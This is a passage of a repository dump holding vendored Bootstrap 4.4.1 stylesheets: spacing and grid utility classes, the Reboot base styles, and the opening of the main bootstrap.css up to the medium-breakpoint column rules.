-0.25rem !important; } .mr-lg-n1, .mx-lg-n1 { margin-right: -0.25rem !important; } .mb-lg-n1, .my-lg-n1 { margin-bottom: -0.25rem !important; } .ml-lg-n1, .mx-lg-n1 { margin-left: -0.25rem !important; } .m-lg-n2 { margin: -0.5rem !important; } .mt-lg-n2, .my-lg-n2 { margin-top: -0.5rem !important; } .mr-lg-n2, .mx-lg-n2 { margin-right: -0.5rem !important; } .mb-lg-n2, .my-lg-n2 { margin-bottom: -0.5rem !important; } .ml-lg-n2, .mx-lg-n2 { margin-left: -0.5rem !important; } .m-lg-n3 { margin: -1rem !important; } .mt-lg-n3, .my-lg-n3 { margin-top: -1rem !important; } .mr-lg-n3, .mx-lg-n3 { margin-right: -1rem !important; } .mb-lg-n3, .my-lg-n3 { margin-bottom: -1rem !important; } .ml-lg-n3, .mx-lg-n3 { margin-left: -1rem !important; } .m-lg-n4 { margin: -1.5rem !important; } .mt-lg-n4, .my-lg-n4 { margin-top: -1.5rem !important; } .mr-lg-n4, .mx-lg-n4 { margin-right: -1.5rem !important; } .mb-lg-n4, .my-lg-n4 { margin-bottom: -1.5rem !important; } .ml-lg-n4, .mx-lg-n4 { margin-left: -1.5rem !important; } .m-lg-n5 { margin: -3rem !important; } .mt-lg-n5, .my-lg-n5 { margin-top: -3rem !important; } .mr-lg-n5, .mx-lg-n5 { margin-right: -3rem !important; } .mb-lg-n5, .my-lg-n5 { margin-bottom: -3rem !important; } .ml-lg-n5, .mx-lg-n5 { margin-left: -3rem !important; } .m-lg-auto { margin: auto !important; } .mt-lg-auto, .my-lg-auto { margin-top: auto !important; } .mr-lg-auto, .mx-lg-auto { margin-right: auto !important; } .mb-lg-auto, .my-lg-auto { margin-bottom: auto !important; } .ml-lg-auto, .mx-lg-auto { margin-left: auto !important; } } @media (min-width: 1200px) { .m-xl-0 { margin: 0 !important; } .mt-xl-0, .my-xl-0 { margin-top: 0 !important; } .mr-xl-0, .mx-xl-0 { margin-right: 0 !important; } .mb-xl-0, .my-xl-0 { margin-bottom: 0 !important; } .ml-xl-0, .mx-xl-0 { margin-left: 0 !important; } .m-xl-1 { margin: 0.25rem !important; } .mt-xl-1, .my-xl-1 { margin-top: 0.25rem !important; } .mr-xl-1, .mx-xl-1 { margin-right: 0.25rem !important; } .mb-xl-1, .my-xl-1 { margin-bottom: 0.25rem !important; } .ml-xl-1, .mx-xl-1 { margin-left: 0.25rem !important; } .m-xl-2 { margin: 0.5rem !important; } .mt-xl-2, .my-xl-2 { margin-top: 0.5rem !important; } .mr-xl-2, .mx-xl-2 { margin-right: 0.5rem !important; } .mb-xl-2, .my-xl-2 { margin-bottom: 0.5rem !important; } .ml-xl-2, .mx-xl-2 { margin-left: 0.5rem !important; } .m-xl-3 { margin: 1rem !important; } .mt-xl-3, .my-xl-3 { margin-top: 1rem !important; } .mr-xl-3, .mx-xl-3 { margin-right: 1rem !important; } .mb-xl-3, .my-xl-3 { margin-bottom: 1rem !important; } .ml-xl-3, .mx-xl-3 { margin-left: 1rem !important; } .m-xl-4 { margin: 1.5rem !important; } .mt-xl-4, .my-xl-4 { margin-top: 1.5rem !important; } .mr-xl-4, .mx-xl-4 { margin-right: 1.5rem !important; } .mb-xl-4, .my-xl-4 { margin-bottom: 1.5rem !important; } .ml-xl-4, .mx-xl-4 { margin-left: 1.5rem !important; } .m-xl-5 { margin: 3rem !important; } .mt-xl-5, .my-xl-5 { margin-top: 3rem !important; } .mr-xl-5, .mx-xl-5 { margin-right: 3rem !important; } .mb-xl-5, .my-xl-5 { margin-bottom: 3rem !important; } .ml-xl-5, .mx-xl-5 { margin-left: 3rem !important; } .p-xl-0 { padding: 0 !important; } .pt-xl-0, .py-xl-0 { padding-top: 0 !important; } .pr-xl-0, .px-xl-0 { padding-right: 0 !important; } .pb-xl-0, .py-xl-0 { padding-bottom: 0 !important; } .pl-xl-0, .px-xl-0 { padding-left: 0 !important; } .p-xl-1 { padding: 0.25rem !important; } .pt-xl-1, .py-xl-1 { padding-top: 0.25rem !important; } .pr-xl-1, .px-xl-1 { padding-right: 0.25rem !important; } .pb-xl-1, .py-xl-1 { padding-bottom: 0.25rem !important; } .pl-xl-1, .px-xl-1 { padding-left: 0.25rem !important; } .p-xl-2 { padding: 0.5rem !important; } .pt-xl-2, .py-xl-2 { padding-top: 0.5rem !important; } .pr-xl-2, .px-xl-2 { padding-right: 0.5rem !important; } .pb-xl-2, .py-xl-2 { padding-bottom: 0.5rem !important; } .pl-xl-2, .px-xl-2 { padding-left: 0.5rem !important; } .p-xl-3 { padding: 1rem !important; } .pt-xl-3, .py-xl-3 { padding-top: 1rem !important; } .pr-xl-3, .px-xl-3 { padding-right: 1rem !important; } .pb-xl-3, .py-xl-3 { padding-bottom: 1rem !important; } .pl-xl-3, .px-xl-3 { padding-left: 1rem !important; } .p-xl-4 { padding: 1.5rem !important; } .pt-xl-4, .py-xl-4 { padding-top: 1.5rem !important; } .pr-xl-4, .px-xl-4 { padding-right: 1.5rem !important; } .pb-xl-4, .py-xl-4 { padding-bottom: 1.5rem !important; } .pl-xl-4, .px-xl-4 { padding-left: 1.5rem !important; } .p-xl-5 { padding: 3rem !important; } .pt-xl-5, .py-xl-5 { padding-top: 3rem !important; } .pr-xl-5, .px-xl-5 { padding-right: 3rem !important; } .pb-xl-5, .py-xl-5 { padding-bottom: 3rem !important; } .pl-xl-5, .px-xl-5 { padding-left: 3rem !important; } .m-xl-n1 { margin: -0.25rem !important; } .mt-xl-n1, .my-xl-n1 { margin-top: -0.25rem !important; } .mr-xl-n1, .mx-xl-n1 { margin-right: -0.25rem !important; } .mb-xl-n1, .my-xl-n1 { margin-bottom: -0.25rem !important; } .ml-xl-n1, .mx-xl-n1 { margin-left: -0.25rem !important; } .m-xl-n2 { margin: -0.5rem !important; } .mt-xl-n2, .my-xl-n2 { margin-top: -0.5rem !important; } .mr-xl-n2, .mx-xl-n2 { margin-right: -0.5rem !important; } .mb-xl-n2, .my-xl-n2 { margin-bottom: -0.5rem !important; } .ml-xl-n2, .mx-xl-n2 { margin-left: -0.5rem !important; } .m-xl-n3 { margin: -1rem !important; } .mt-xl-n3, .my-xl-n3 { margin-top: -1rem !important; } .mr-xl-n3, .mx-xl-n3 { margin-right: -1rem !important; } .mb-xl-n3, .my-xl-n3 { margin-bottom: -1rem !important; } .ml-xl-n3, .mx-xl-n3 { margin-left: -1rem !important; } .m-xl-n4 { margin: -1.5rem !important; } .mt-xl-n4, .my-xl-n4 { margin-top: -1.5rem !important; } .mr-xl-n4, .mx-xl-n4 { margin-right: -1.5rem !important; } .mb-xl-n4, .my-xl-n4 { margin-bottom: -1.5rem !important; } .ml-xl-n4, .mx-xl-n4 { margin-left: -1.5rem !important; } .m-xl-n5 { margin: -3rem !important; } .mt-xl-n5, .my-xl-n5 { margin-top: -3rem !important; } .mr-xl-n5, .mx-xl-n5 { margin-right: -3rem !important; } .mb-xl-n5, .my-xl-n5 { margin-bottom: -3rem !important; } .ml-xl-n5, .mx-xl-n5 { margin-left: -3rem !important; } .m-xl-auto { margin: auto !important; } .mt-xl-auto, .my-xl-auto { margin-top: auto !important; } .mr-xl-auto, .mx-xl-auto { margin-right: auto !important; } .mb-xl-auto, .my-xl-auto { margin-bottom: auto !important; } .ml-xl-auto, .mx-xl-auto { margin-left: auto !important; } } /*# sourceMappingURL=bootstrap-grid.css.map */ ================================================ FILE: static/vendor/bootstrap-4.4.1-dist/css/bootstrap-reboot.css ================================================ /*! * Bootstrap Reboot v4.4.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors * Copyright 2011-2019 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) * Forked from Normalize.css, licensed MIT (https://github.com/necolas/normalize.css/blob/master/LICENSE.md) */ *, *::before, *::after { box-sizing: border-box; } html { font-family: sans-serif; line-height: 1.15; -webkit-text-size-adjust: 100%; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } article, aside, figcaption, figure, footer, header, hgroup, main, nav, section { display: block; } body { margin: 0; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji"; font-size: 1rem; font-weight: 400; line-height: 1.5; color: #212529; text-align: left; background-color: #fff; } [tabindex="-1"]:focus:not(:focus-visible) { outline: 0 !important; } hr { box-sizing: content-box; height: 0; overflow: visible; } h1, h2, h3, h4, h5, h6 { margin-top: 0; margin-bottom: 0.5rem; } p { margin-top: 0; margin-bottom: 1rem; } abbr[title], abbr[data-original-title] { text-decoration: underline; -webkit-text-decoration: underline dotted; text-decoration: underline dotted; cursor: help; border-bottom: 0; -webkit-text-decoration-skip-ink: none; text-decoration-skip-ink: none; } address { margin-bottom: 1rem; font-style: normal; line-height: inherit; } ol, ul, dl { margin-top: 0; margin-bottom: 1rem; } ol ol, ul ul, ol ul, ul ol { margin-bottom: 0; } dt { font-weight: 700; } dd { margin-bottom: .5rem; margin-left: 0; } blockquote { margin: 0 0 1rem; } b, strong { font-weight: bolder; } small { font-size: 80%; } sub, sup { position: relative; font-size: 75%; line-height: 0; vertical-align: baseline; } sub { bottom: -.25em; } sup { top: -.5em; } a { color: #007bff; text-decoration: none; background-color: transparent; } a:hover { color: #0056b3; text-decoration: underline; } a:not([href]) { color: inherit; text-decoration: none; } a:not([href]):hover { color: inherit; text-decoration: none; } pre, code, kbd, samp { font-family: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace; font-size: 1em; } pre { margin-top: 0; margin-bottom: 1rem; overflow: auto; } figure { margin: 0 0 1rem; } img { vertical-align: middle; border-style: none; } svg { overflow: hidden; vertical-align: middle; } table { border-collapse: collapse; } caption { padding-top: 0.75rem; padding-bottom: 0.75rem; color: #6c757d; text-align: left; caption-side: bottom; } th { text-align: inherit; } label { display: inline-block; margin-bottom: 0.5rem; } button { border-radius: 0; } button:focus { outline: 1px dotted; outline: 5px auto -webkit-focus-ring-color; } input, button, select, optgroup, textarea { margin: 0; font-family: inherit; font-size: inherit; line-height: inherit; } button, input { overflow: visible; } button, select { text-transform: none; } select { word-wrap: normal; } button, [type="button"], [type="reset"], [type="submit"] { -webkit-appearance: button; } button:not(:disabled), [type="button"]:not(:disabled), [type="reset"]:not(:disabled), [type="submit"]:not(:disabled) { cursor: pointer; } button::-moz-focus-inner, [type="button"]::-moz-focus-inner, [type="reset"]::-moz-focus-inner, [type="submit"]::-moz-focus-inner { padding: 0; border-style: none; } input[type="radio"], input[type="checkbox"] { box-sizing: border-box; padding: 0; } input[type="date"], input[type="time"], input[type="datetime-local"], input[type="month"] { -webkit-appearance: listbox; } textarea { overflow: auto; resize: vertical; } fieldset { min-width: 0; padding: 0; margin: 0; border: 0; } legend { display: block; width: 100%; max-width: 100%; padding: 0; margin-bottom: .5rem; font-size: 1.5rem; line-height: inherit; color: inherit; white-space: normal; } progress { vertical-align: baseline; } [type="number"]::-webkit-inner-spin-button, [type="number"]::-webkit-outer-spin-button { height: auto; } [type="search"] { outline-offset: -2px; -webkit-appearance: none; } [type="search"]::-webkit-search-decoration { -webkit-appearance: none; } ::-webkit-file-upload-button { font: inherit; -webkit-appearance: button; } output { display: inline-block; } summary { display: list-item; cursor: pointer; } template { display: none; } [hidden] { display: none !important; } /*# sourceMappingURL=bootstrap-reboot.css.map */ ================================================ FILE: static/vendor/bootstrap-4.4.1-dist/css/bootstrap.css ================================================ /*! * Bootstrap v4.4.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors * Copyright 2011-2019 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007bff; --indigo: #6610f2; --purple: #6f42c1; --pink: #e83e8c; --red: #dc3545; --orange: #fd7e14; --yellow: #ffc107; --green: #28a745; --teal: #20c997; --cyan: #17a2b8; --white: #fff; --gray: #6c757d; --gray-dark: #343a40; --primary: #007bff; --secondary: #6c757d; --success: #28a745; --info: #17a2b8; --warning: #ffc107; --danger: #dc3545; --light: #f8f9fa; --dark: #343a40; --breakpoint-xs: 0; --breakpoint-sm: 576px; --breakpoint-md: 768px; --breakpoint-lg: 992px; --breakpoint-xl: 1200px; --font-family-sans-serif: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji"; --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace; } *, *::before, *::after { box-sizing: border-box; } html { font-family: sans-serif; line-height: 1.15; -webkit-text-size-adjust: 100%; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } article, aside, figcaption, figure, footer, header, hgroup, main, nav, section { display: block; } body { margin: 0; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji"; font-size: 1rem; font-weight: 400; line-height: 1.5; color: #212529; text-align: left; background-color: #fff; } [tabindex="-1"]:focus:not(:focus-visible) { outline: 0 !important; } hr { box-sizing: content-box; height: 0; overflow: visible; } h1, h2, h3, h4, h5, h6 { margin-top: 0; margin-bottom: 0.5rem; } p { margin-top: 0; margin-bottom: 1rem; } abbr[title], abbr[data-original-title] { text-decoration: underline; -webkit-text-decoration: underline dotted; text-decoration: underline dotted; cursor: help; border-bottom: 0; -webkit-text-decoration-skip-ink: none; text-decoration-skip-ink: none; } address { margin-bottom: 1rem; font-style: normal; line-height: inherit; } ol, ul, dl { margin-top: 0; margin-bottom: 1rem; } ol ol, ul ul, ol ul, ul ol { margin-bottom: 0; } dt { font-weight: 700; } dd { margin-bottom: .5rem; margin-left: 0; } blockquote { margin: 0 0 1rem; } b, strong { font-weight: bolder; } small { font-size: 80%; } sub, sup { position: relative; font-size: 75%; line-height: 0; vertical-align: baseline; } sub { bottom: -.25em; } sup { top: -.5em; } a { color: #007bff; text-decoration: none; background-color: transparent; } a:hover { color: #0056b3; text-decoration: underline; } a:not([href]) { color: inherit; text-decoration: none; } a:not([href]):hover { color: inherit; text-decoration: none; } pre, code, kbd, samp { font-family: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace; font-size: 1em; } pre { margin-top: 0; margin-bottom: 1rem; overflow: auto; } figure { margin: 0 0 1rem; } img { vertical-align: middle; border-style: none; } svg { overflow: hidden; vertical-align: middle; } table { border-collapse: collapse; } caption { padding-top: 0.75rem; padding-bottom: 0.75rem; color: #6c757d; text-align: left; caption-side: bottom; } th { text-align: inherit; } label { display: inline-block; margin-bottom: 0.5rem; } button { border-radius: 0; } button:focus { outline: 1px dotted; outline: 5px auto -webkit-focus-ring-color; } input, button, select, optgroup, textarea { margin: 0; font-family: inherit; font-size: inherit; line-height: inherit; } button, input { overflow: visible; } button, select { text-transform: none; } select { word-wrap: normal; } button, [type="button"], [type="reset"], [type="submit"] { -webkit-appearance: button; } button:not(:disabled), [type="button"]:not(:disabled), [type="reset"]:not(:disabled), [type="submit"]:not(:disabled) { cursor: pointer; } button::-moz-focus-inner, [type="button"]::-moz-focus-inner, [type="reset"]::-moz-focus-inner, [type="submit"]::-moz-focus-inner { padding: 0; border-style: none; } input[type="radio"], input[type="checkbox"] { box-sizing: border-box; padding: 0; } input[type="date"], input[type="time"], input[type="datetime-local"], input[type="month"] { -webkit-appearance: listbox; } textarea { overflow: auto; resize: vertical; } fieldset { min-width: 0; padding: 0; margin: 0; border: 0; } legend { display: block; width: 100%; max-width: 100%; padding: 0; margin-bottom: .5rem; font-size: 1.5rem; line-height: inherit; color: inherit; white-space: normal; } progress { vertical-align: baseline; } [type="number"]::-webkit-inner-spin-button, [type="number"]::-webkit-outer-spin-button { height: auto; } [type="search"] { outline-offset: -2px; -webkit-appearance: none; } [type="search"]::-webkit-search-decoration { -webkit-appearance: none; } ::-webkit-file-upload-button { font: inherit; -webkit-appearance: button; } output { display: inline-block; } summary { display: list-item; cursor: pointer; } template { display: none; } [hidden] { display: none !important; } h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 { margin-bottom: 0.5rem; font-weight: 500; line-height: 1.2; } h1, .h1 { font-size: 2.5rem; } h2, .h2 { font-size: 2rem; } h3, .h3 { font-size: 1.75rem; } h4, .h4 { font-size: 1.5rem; } h5, .h5 { font-size: 1.25rem; } h6, .h6 { font-size: 1rem; } .lead { font-size: 1.25rem; font-weight: 300; } .display-1 { font-size: 6rem; font-weight: 300; line-height: 1.2; } .display-2 { font-size: 5.5rem; font-weight: 300; line-height: 1.2; } .display-3 { font-size: 4.5rem; font-weight: 300; line-height: 1.2; } .display-4 { font-size: 3.5rem; font-weight: 300; line-height: 1.2; } hr { margin-top: 1rem; margin-bottom: 1rem; border: 0; border-top: 1px solid rgba(0, 0, 0, 0.1); } small, .small { font-size: 80%; font-weight: 400; } mark, .mark { padding: 0.2em; background-color: #fcf8e3; } .list-unstyled { padding-left: 0; list-style: none; } .list-inline { padding-left: 0; list-style: none; } .list-inline-item { display: inline-block; } .list-inline-item:not(:last-child) { margin-right: 0.5rem; } .initialism { font-size: 90%; text-transform: uppercase; } .blockquote { margin-bottom: 1rem; font-size: 1.25rem; } .blockquote-footer { display: block; font-size: 80%; color: #6c757d; } .blockquote-footer::before { content: "\2014\00A0"; } .img-fluid { max-width: 100%; height: auto; } .img-thumbnail { padding: 0.25rem; background-color: #fff; border: 1px solid #dee2e6; border-radius: 0.25rem; max-width: 100%; height: auto; } .figure { display: inline-block; } .figure-img { margin-bottom: 0.5rem; line-height: 1; } .figure-caption { font-size: 90%; color: #6c757d; } code { font-size: 87.5%; color: #e83e8c; word-wrap: break-word; } a > code { color: inherit; } kbd { padding: 0.2rem 0.4rem; font-size: 87.5%; color: #fff; background-color: #212529; border-radius: 0.2rem; } kbd kbd { padding: 0; font-size: 100%; font-weight: 700; } pre { display: block; font-size: 87.5%; color: #212529; } pre code { font-size: inherit; color: inherit; word-break: normal; } .pre-scrollable { max-height: 340px; overflow-y: scroll; } .container { width: 100%; padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto; } @media (min-width: 576px) { .container { max-width: 540px; } } @media (min-width: 768px) { .container { max-width: 720px; } } @media (min-width: 992px) { .container { max-width: 960px; } } @media (min-width: 1200px) { .container { max-width: 1140px; } } .container-fluid, .container-sm, .container-md, .container-lg, .container-xl { width: 100%; padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto; } @media (min-width: 576px) { .container, .container-sm { max-width: 540px; } } @media (min-width: 768px) { .container, .container-sm, .container-md { max-width: 720px; } } @media (min-width: 992px) { .container, .container-sm, .container-md, .container-lg { max-width: 960px; } } @media (min-width: 1200px) { .container, .container-sm, .container-md, .container-lg, .container-xl { max-width: 1140px; } } .row { display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; margin-right: -15px; margin-left: -15px; } .no-gutters { margin-right: 0; margin-left: 0; } .no-gutters > .col, .no-gutters > [class*="col-"] { padding-right: 0; padding-left: 0; } .col-1, .col-2, .col-3, .col-4, .col-5, .col-6, .col-7, .col-8, .col-9, .col-10, .col-11, .col-12, .col, .col-auto, .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm, .col-sm-auto, .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12, .col-md, .col-md-auto, .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg, .col-lg-auto, .col-xl-1, .col-xl-2, .col-xl-3, .col-xl-4, .col-xl-5, .col-xl-6, .col-xl-7, .col-xl-8, .col-xl-9, .col-xl-10, .col-xl-11, .col-xl-12, .col-xl, .col-xl-auto { position: relative; width: 100%; padding-right: 15px; padding-left: 15px; } .col { -ms-flex-preferred-size: 0; flex-basis: 0; -ms-flex-positive: 1; flex-grow: 1; max-width: 100%; } .row-cols-1 > * { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .row-cols-2 > * { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .row-cols-3 > * { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .row-cols-4 > * { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .row-cols-5 > * { -ms-flex: 0 0 20%; flex: 0 0 20%; max-width: 20%; } .row-cols-6 > * { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-auto { -ms-flex: 0 0 auto; flex: 0 0 auto; width: auto; max-width: 100%; } .col-1 { -ms-flex: 0 0 8.333333%; flex: 0 0 8.333333%; max-width: 8.333333%; } .col-2 { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-3 { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .col-4 { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .col-5 { -ms-flex: 0 0 41.666667%; flex: 0 0 41.666667%; max-width: 41.666667%; } .col-6 { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .col-7 { -ms-flex: 0 0 58.333333%; flex: 0 0 58.333333%; max-width: 58.333333%; } .col-8 { -ms-flex: 0 0 66.666667%; flex: 0 0 66.666667%; max-width: 66.666667%; } .col-9 { -ms-flex: 0 0 75%; flex: 0 0 75%; max-width: 75%; } .col-10 { -ms-flex: 0 0 83.333333%; flex: 0 0 83.333333%; max-width: 83.333333%; } .col-11 { -ms-flex: 0 0 91.666667%; flex: 0 0 91.666667%; max-width: 91.666667%; } .col-12 { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .order-first { -ms-flex-order: -1; order: -1; } .order-last { -ms-flex-order: 13; order: 13; } .order-0 { -ms-flex-order: 0; order: 0; } .order-1 { -ms-flex-order: 1; order: 1; } .order-2 { -ms-flex-order: 2; order: 2; } .order-3 { -ms-flex-order: 3; order: 3; } .order-4 { -ms-flex-order: 4; order: 4; } .order-5 { -ms-flex-order: 5; order: 5; } .order-6 { -ms-flex-order: 6; order: 6; } .order-7 { -ms-flex-order: 7; order: 7; } .order-8 { -ms-flex-order: 8; order: 8; } .order-9 { -ms-flex-order: 9; order: 9; } .order-10 { -ms-flex-order: 10; order: 10; } .order-11 { -ms-flex-order: 11; order: 11; } .order-12 { -ms-flex-order: 12; order: 12; } .offset-1 { margin-left: 8.333333%; } .offset-2 { margin-left: 16.666667%; } .offset-3 { margin-left: 25%; } .offset-4 { margin-left: 33.333333%; } .offset-5 { margin-left: 41.666667%; } .offset-6 { margin-left: 50%; } .offset-7 { margin-left: 58.333333%; } .offset-8 { margin-left: 66.666667%; } .offset-9 { margin-left: 75%; } .offset-10 { margin-left: 83.333333%; } .offset-11 { margin-left: 91.666667%; } @media (min-width: 576px) { .col-sm { -ms-flex-preferred-size: 0; flex-basis: 0; -ms-flex-positive: 1; flex-grow: 1; max-width: 100%; } .row-cols-sm-1 > * { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .row-cols-sm-2 > * { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .row-cols-sm-3 > * { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .row-cols-sm-4 > * { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .row-cols-sm-5 > * { -ms-flex: 0 0 20%; flex: 0 0 20%; max-width: 20%; } .row-cols-sm-6 > * { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-sm-auto { -ms-flex: 0 0 auto; flex: 0 0 auto; width: auto; max-width: 100%; } .col-sm-1 { -ms-flex: 0 0 8.333333%; flex: 0 0 8.333333%; max-width: 8.333333%; } .col-sm-2 { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-sm-3 { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .col-sm-4 { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .col-sm-5 { -ms-flex: 0 0 41.666667%; flex: 0 0 41.666667%; max-width: 41.666667%; } .col-sm-6 { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .col-sm-7 { -ms-flex: 0 0 58.333333%; flex: 0 0 58.333333%; max-width: 58.333333%; } .col-sm-8 { -ms-flex: 0 0 66.666667%; flex: 0 0 66.666667%; max-width: 66.666667%; } .col-sm-9 { -ms-flex: 0 0 75%; flex: 0 0 75%; max-width: 75%; } .col-sm-10 { -ms-flex: 0 0 83.333333%; flex: 0 0 83.333333%; max-width: 83.333333%; } .col-sm-11 { -ms-flex: 0 0 91.666667%; flex: 0 0 91.666667%; max-width: 91.666667%; } .col-sm-12 { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .order-sm-first { -ms-flex-order: -1; order: -1; } .order-sm-last { -ms-flex-order: 13; order: 13; } .order-sm-0 { -ms-flex-order: 0; order: 0; } .order-sm-1 { -ms-flex-order: 1; order: 1; } .order-sm-2 { -ms-flex-order: 2; order: 2; } .order-sm-3 { -ms-flex-order: 3; order: 3; } .order-sm-4 { -ms-flex-order: 4; order: 4; } .order-sm-5 { -ms-flex-order: 5; order: 5; } .order-sm-6 { -ms-flex-order: 6; order: 6; } .order-sm-7 { -ms-flex-order: 7; order: 7; } .order-sm-8 { -ms-flex-order: 8; order: 8; } .order-sm-9 { -ms-flex-order: 9; order: 9; } .order-sm-10 { -ms-flex-order: 10; order: 10; } .order-sm-11 { -ms-flex-order: 11; order: 11; } .order-sm-12 { -ms-flex-order: 12; order: 12; } .offset-sm-0 { margin-left: 0; } .offset-sm-1 { margin-left: 8.333333%; } .offset-sm-2 { margin-left: 16.666667%; } .offset-sm-3 { margin-left: 25%; } .offset-sm-4 { margin-left: 33.333333%; } .offset-sm-5 { margin-left: 41.666667%; } .offset-sm-6 { margin-left: 50%; } .offset-sm-7 { margin-left: 58.333333%; } .offset-sm-8 { margin-left: 66.666667%; } .offset-sm-9 { margin-left: 75%; } .offset-sm-10 { margin-left: 83.333333%; } .offset-sm-11 { margin-left: 91.666667%; } } @media (min-width: 768px) { .col-md { -ms-flex-preferred-size: 0; flex-basis: 0; -ms-flex-positive: 1; flex-grow: 1; max-width: 100%; } .row-cols-md-1 > * { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .row-cols-md-2 > * { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .row-cols-md-3 > * { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .row-cols-md-4 > * { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .row-cols-md-5 > * { -ms-flex: 0 0 20%; flex: 0 0 20%; max-width: 20%; } .row-cols-md-6 > * { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-md-auto { -ms-flex: 0 0 auto; flex: 0 0 auto; width: auto; max-width: 100%; } .col-md-1 { -ms-flex: 0 0 8.333333%; flex: 0 0 8.333333%; max-width: 8.333333%; } .col-md-2 { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-md-3 { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .col-md-4 { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .col-md-5 { -ms-flex: 0 0 41.666667%; flex: 0 0 41.666667%; max-width: 41.666667%; } .col-md-6 { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .col-md-7 { -ms-flex: 0 0 58.333333%; flex: 0 0 58.333333%; max-width: 58.333333%; } .col-md-8 { -ms-flex: 0 0 66.666667%; flex: 0 0 66.666667%; max-width: 66.666667%; } .col-md-9 { -ms-flex: 0 0 75%; flex: 0 0 75%; max-width: 75%; } .col-md-10 { -ms-flex: 0 0 83.333333%; flex: 0 0 83.333333%; max-width: 83.333333%; } .col-md-11 { -ms-flex: 0 0 91.666667%; flex: 0 0 91.666667%; max-width: 91.666667%; } .col-md-12 { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .order-md-first { -ms-flex-order: -1; order: -1; } .order-md-last { -ms-flex-order: 13; order: 13; } .order-md-0 { -ms-flex-order: 0; order: 0; } .order-md-1 { -ms-flex-order: 1; order: 1; } .order-md-2 { -ms-flex-order: 2; order: 2; } .order-md-3 { -ms-flex-order: 3; order: 3; } .order-md-4 { -ms-flex-order: 4; order: 4; } .order-md-5 { -ms-flex-order: 5; order: 5; } .order-md-6 { -ms-flex-order: 6; order: 6; } .order-md-7 { -ms-flex-order: 7; order: 7; } .order-md-8 { -ms-flex-order: 8; order: 8; } .order-md-9 { -ms-flex-order: 9; order: 9; } .order-md-10 { -ms-flex-order: 10; order: 10; } .order-md-11 { -ms-flex-order: 11; order: 11; } .order-md-12 { -ms-flex-order: 12; order: 12; } .offset-md-0 { margin-left: 0; } .offset-md-1 { margin-left: 8.333333%; } .offset-md-2 { margin-left: 16.666667%; } .offset-md-3 { margin-left: 25%; } .offset-md-4 { margin-left: 33.333333%; } .offset-md-5 { margin-left: 